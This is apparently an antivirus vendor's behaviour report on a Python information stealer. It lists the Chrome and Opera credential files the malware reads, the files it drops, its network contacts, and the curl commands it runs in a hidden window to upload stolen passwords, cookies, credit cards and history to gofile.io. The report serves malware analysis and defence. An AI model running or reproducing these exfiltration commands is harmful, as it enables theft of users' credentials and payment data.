Python.Stealer.1158

Python.Stealer.1158

Добавлен в вирусную базу Dr.Web: 2023-10-04

Описание добавлено: 2024-03-29

Technical Information

Malicious functions

Reads files which store third party applications passwords

%APPDATA%\opera software\opera stable\login data
%LOCALAPPDATA%\google\chrome\user data\default\web data
%LOCALAPPDATA%\google\chrome\user data\default\login data

Modifies file system

Creates the following files

%TEMP%\_mei25122\crypto\cipher\_arc4.pyd
%TEMP%\_mei25122\win32com\shell\shell.pyd
%TEMP%\_mei25122\win32\win32trace.pyd
%TEMP%\_mei25122\win32\win32api.pyd
%TEMP%\_mei25122\win32\_win32sysloader.pyd
%TEMP%\_mei25122\unicodedata.pyd
%TEMP%\_mei25122\sqlite3.dll
%TEMP%\_mei25122\select.pyd
%TEMP%\_mei25122\pywin32_system32\pywintypes39.dll
%TEMP%\_mei25122\pywin32_system32\pythoncom39.dll
%TEMP%\_mei25122\base_library.zip
%TEMP%\_mei25122\python39.dll
%TEMP%\_mei25122\libssl-1_1.dll
%TEMP%\_mei25122\libffi-7.dll
%TEMP%\_mei25122\libcrypto-1_1.dll
%TEMP%\_mei25122\_uuid.pyd
%TEMP%\_mei25122\_ssl.pyd
%TEMP%\_mei25122\_sqlite3.pyd
%TEMP%\_mei25122\_socket.pyd
%TEMP%\_mei25122\_queue.pyd
%TEMP%\_mei25122\_multiprocessing.pyd
%TEMP%\_mei25122\pyexpat.pyd
%TEMP%\_mei25122\pip-20.2.3.dist-info\installer
%TEMP%\_mei25122\pip-20.2.3.dist-info\license.txt
%TEMP%\_mei25122\pip-20.2.3.dist-info\metadata
%TEMP%\wphistory.txt
%LOCALAPPDATA%\tempwptxglwdmw.db
%LOCALAPPDATA%\tempwpevmytkfb.db
%LOCALAPPDATA%\tempwplkqstwxt.db
%LOCALAPPDATA%\tempwpdonbgdwh.db
%LOCALAPPDATA%\tempwpbtthpcql.db
%LOCALAPPDATA%\tempwpwqgbxvhq.db
%TEMP%\8rb45aca
%TEMP%\_mei25122\setuptools-49.2.1.dist-info\zip-safe
%TEMP%\_mei25122\setuptools-49.2.1.dist-info\top_level.txt
%TEMP%\_mei25122\setuptools-49.2.1.dist-info\entry_points.txt
%TEMP%\_mei25122\setuptools-49.2.1.dist-info\dependency_links.txt
%TEMP%\_mei25122\setuptools-49.2.1.dist-info\wheel
%TEMP%\_mei25122\setuptools-49.2.1.dist-info\record
%TEMP%\_mei25122\setuptools-49.2.1.dist-info\metadata
%TEMP%\_mei25122\setuptools-49.2.1.dist-info\license
%TEMP%\_mei25122\setuptools-49.2.1.dist-info\installer
%TEMP%\_mei25122\pip-20.2.3.dist-info\top_level.txt
%TEMP%\_mei25122\pip-20.2.3.dist-info\entry_points.txt
%TEMP%\_mei25122\pip-20.2.3.dist-info\wheel
%TEMP%\_mei25122\pip-20.2.3.dist-info\record
%TEMP%\_mei25122\_lzma.pyd
%LOCALAPPDATA%\tempwpxiugjxgw.db
%TEMP%\_mei25122\_hashlib.pyd
%TEMP%\_mei25122\_ctypes.pyd
%TEMP%\_mei25122\crypto\hash\_md2.pyd
%TEMP%\_mei25122\crypto\hash\_blake2s.pyd
%TEMP%\_mei25122\crypto\hash\_blake2b.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_ofb.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_ocb.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_eksblowfish.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_ecb.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_des3.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_des.pyd
%TEMP%\_mei25122\crypto\hash\_md4.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_ctr.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_cbc.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_cast.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_blowfish.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_arc2.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_aesni.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_aes.pyd
%TEMP%\_mei25122\crypto\cipher\_pkcs1_decode.pyd
%TEMP%\_mei25122\crypto\cipher\_chacha20.pyd
%TEMP%\_mei25122\crypto\cipher\_salsa20.pyd
%TEMP%\_mei25122\crypto\cipher\_raw_cfb.pyd
%TEMP%\_mei25122\crypto\hash\_md5.pyd
%TEMP%\_mei25122\crypto\hash\_ripemd160.pyd
%TEMP%\_mei25122\crypto\hash\_sha1.pyd
%TEMP%\_mei25122\_cffi_backend.cp39-win32.pyd
%TEMP%\_mei25122\_bz2.pyd
%TEMP%\_mei25122\vcruntime140.dll
%TEMP%\_mei25122\pythonwin\win32ui.pyd
%TEMP%\_mei25122\pythonwin\mfc140u.dll
%TEMP%\_mei25122\crypto\util\_strxor.pyd
%TEMP%\_mei25122\crypto\util\_cpuid_c.pyd
%TEMP%\_mei25122\crypto\publickey\_x25519.pyd
%TEMP%\_mei25122\crypto\publickey\_ed448.pyd
%TEMP%\_mei25122\crypto\publickey\_ed25519.pyd
%TEMP%\_mei25122\crypto\publickey\_ec_ws.pyd
%TEMP%\_mei25122\crypto\protocol\_scrypt.pyd
%TEMP%\_mei25122\crypto\math\_modexp.pyd
%TEMP%\_mei25122\crypto\hash\_poly1305.pyd
%TEMP%\_mei25122\crypto\hash\_keccak.pyd
%TEMP%\_mei25122\crypto\hash\_ghash_portable.pyd
%TEMP%\_mei25122\crypto\hash\_ghash_clmul.pyd
%TEMP%\_mei25122\crypto\hash\_sha512.pyd
%TEMP%\_mei25122\crypto\hash\_sha384.pyd
%TEMP%\_mei25122\crypto\hash\_sha256.pyd
%TEMP%\_mei25122\crypto\hash\_sha224.pyd
%TEMP%\_mei25122\_decimal.pyd
%LOCALAPPDATA%\tempwpljgfickf.db

Network activity

Connects to

'ap#.#pify.org':443
'ap#.#ofile.io':443
'ge####ation-db.com':443
'st####.gofile.io':443
'x1.#.lencr.org':80
'r3.#.lencr.org':80
'di##ord.com':443

TCP

HTTP GET requests

http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB039D4329A5E8.crt?c0##############
http://x1.#.lencr.org/
http://r3.#.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgPGtGrqPPAnYk%2FpcAxY9bdYvg%3D%3D

Other

'ap#.#pify.org':443
'ap#.#ofile.io':443
'ge####ation-db.com':443
'st####.gofile.io':443
'di##ord.com':443

UDP

DNS ASK ap#.#pify.org
DNS ASK ap#.#ofile.io
DNS ASK ge####ation-db.com
DNS ASK st####.gofile.io
DNS ASK x1.#.lencr.org
DNS ASK r3.#.lencr.org
DNS ASK di##ord.com

Miscellaneous

Creates and executes the following

'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wppasswords.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpcookies.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpcreditcards.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpautofill.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wphistory.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpparsedcookies.txt" https://store4.gofile.io/uploadFile"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpbookmarks.txt" https://store4.gofile.io/uploadFile"' (with hidden window)

Restarts the analyzed sample

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wppasswords.txt" https://store4.gofile.io/uploadFile"
'%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wppasswords.txt" https://store4.gofile.io/uploadFile
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpcookies.txt" https://store4.gofile.io/uploadFile"
'%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpcookies.txt" https://store4.gofile.io/uploadFile
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpcreditcards.txt" https://store4.gofile.io/uploadFile"
'%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpcreditcards.txt" https://store4.gofile.io/uploadFile
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpautofill.txt" https://store4.gofile.io/uploadFile"
'%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpautofill.txt" https://store4.gofile.io/uploadFile
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wphistory.txt" https://store4.gofile.io/uploadFile"
'%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wphistory.txt" https://store4.gofile.io/uploadFile
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpparsedcookies.txt" https://store4.gofile.io/uploadFile"
'%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpparsedcookies.txt" https://store4.gofile.io/uploadFile
'%WINDIR%\syswow64\cmd.exe' /c "curl -F "file=@%TEMP%\wpbookmarks.txt" https://store4.gofile.io/uploadFile"
'%WINDIR%\syswow64\curl.exe' -F "file=@%TEMP%\wpbookmarks.txt" https://store4.gofile.io/uploadFile

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней